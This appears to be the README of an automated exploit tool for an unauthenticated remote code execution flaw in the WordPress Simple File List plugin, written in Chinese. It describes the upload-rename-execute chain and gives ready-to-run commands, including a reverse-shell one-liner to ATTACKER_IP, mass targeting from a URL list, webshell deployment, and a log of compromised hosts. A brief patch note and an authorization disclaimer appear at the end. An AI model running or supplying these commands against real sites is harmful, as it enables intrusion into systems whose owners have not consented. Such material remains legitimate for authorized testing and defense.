针对 CVE-2025-34085(与 CVE-2020-36847 重复)的自动化利用工具,该漏洞是 WordPress Simple File List 插件版本 ≤ 4.2.2 中的一个关键未认证远程代码执行漏洞。
注意: CVE-2025-34085 被 MITRE 驳回,认为是 CVE-2020-36847 的重复。该漏洞确实存在,并在 4.2.3 版本中得到修复。两个 CVE ID 指向同一底层问题。
| 字段 | 详情 |
|---|---|
| CVE | CVE-2025-34085 / CVE-2020-36847 |
| 插件 | Simple File List |
| 受影响版本 | ≤ 4.2.2 |
| 修复版本 | 4.2.3 |
| 类型 | 无限制文件上传 → 重命名绕过 → 远程代码执行 |
| CVSS | 9.8(严重) |
| 认证 | 无需认证 |
| 原始发现者 | coiffeur |
| Metasploit 模块 | exploit/multi/http/wp_simple_file_list_rce |
上传 — 通过插件的上传接口(ee-upload-engine.php)将一个伪装成 .png 文件的 PHP 载荷上传。上传引擎验证文件扩展名,但接受图片文件。
重命名 — 插件的重命名功能(ee-file-engine.php)没有强制扩展名限制。攻击者将 .png 重命名为 .php(或 .phtml、.php5、.php3)。
执行 — 重命名后的 PHP 文件现在在上传目录 /wp-content/uploads/simple-file-list/ 中可访问并可执行,从而允许攻击者执行任意命令。
pip install requests colorama
Python 3.6+
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
?cmd= 参数)python3 CVE-2025-34085.py -u http://target.com --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" --inline
创建一个 targets.txt 文件,每行一个 URL:
http://target1.com
http://target2.com
https://target3.com
python3 CVE-2025-34085.py --cmd "id"
提示: 当你需要反弹 Shell 或者目标存在查询字符串过滤时,请使用
--inline。如果不使用--inline,利用工具会释放一个接受?cmd=参数的 webshell。
成功利用的记录会写入 vuln.txt:
http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php | uid=33(www-data) gid=33(www-data)
/wp-content/uploads/simple-file-list/<随机>.phpvuln.txt 中——对你的报告很有用--inline 配合反弹 Shell,避免留下带有 ?cmd= 的持久 webshell将 Simple File List 插件升级到 4.2.3 或更高版本。
本工具仅供 授权的渗透测试和教育目的 使用。未经授权访问计算机系统是违法行为。请务必在获得适当授权后再进行测试。
| 参数 | 描述 | 默认值 |
|---|
-u, --url | 单个目标 URL | — |
--cmd | 在目标上执行的命令 | id |
--inline | 将命令直接注入 PHP shell(硬编码,无 ?cmd= webshell) | False |